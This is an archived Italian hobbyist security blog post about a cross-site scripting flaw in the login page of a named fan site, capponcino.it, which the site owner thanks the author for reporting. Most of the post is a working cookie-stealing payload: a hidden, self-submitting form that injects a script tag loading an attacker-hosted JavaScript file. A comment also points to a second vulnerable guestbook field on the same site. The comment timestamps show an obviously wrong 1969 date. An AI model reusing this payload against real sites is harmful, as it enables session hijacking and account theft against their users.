10-06-2007

XSS - Sicurezza sul sito capponcino.it - OWN - FIXED

Ieri pomeriggio analizzavo la sicurezza del sito capponcino.it, che visito spesso, soprattutto per il forum italiano ufficiale di Tremulous. Su piattaforma joomla e phpbb aggiornati è praticamente inattaccabile, a parte per qualche bug di immagini. Successivamente ho visitato, per curiosit� più che altro, lo spazio di uno dei fondatori, creato davvero bene, a parte per la pagina login.php. Questa pagina, infatti, non esegue un controllo efficace degli input (html entities è fondamentale) e mi permette di grabbare i cookie. Come? mi basta questo codice su una mia pagina.

<iframe name="aiuto" frameborder="2" height="600"
width="600"></iframe>
<FORM name="Faiuto"
ACTION="http://www.capponcino.it/alessio/login.php" target="aiuto"
METHOD=POST>
<input type=hidden NAME="username"
value=""><script
src=http://IL NOSTRO FILE .js></script>
">
<input type=hidden NAME="password" value="123">
<input type=hidden NAME="login" value="1">
<input type="image" height="0" width="0">
</FORM>
<SCRIPT>document.Faiuto.submit()</SCRIPT>

e a questo punto il gioco è fatto: abbiamo grabbato i cookie.

Questo articolo è stato pubblicato il 31-12-1969 alle 18:33 e classificato in XSS.

2 Commenti a “XSS - Sicurezza sul sito capponcino.it - OWN - FIXED”

SluX scrive:
31-12-1969 alle 18:33

hehe.. grazie mille per l'avvertimento :) Mi era proprio sfuggito -.-
Nick scrive:
31-12-1969 alle 18:33

Trovato un altro :P Controlla il campo email del guestbook qui :D http://www.capponcino.it/alessio_old/guestbook.php Ok che è il vecchio sito però..XD

Visita il nuovo blog!

Queste pagine sono un archivio del vecchio blog.hanicker.it. Visita ora il mio nuovo blog, cliccando qui.

Tutti i vecchi post: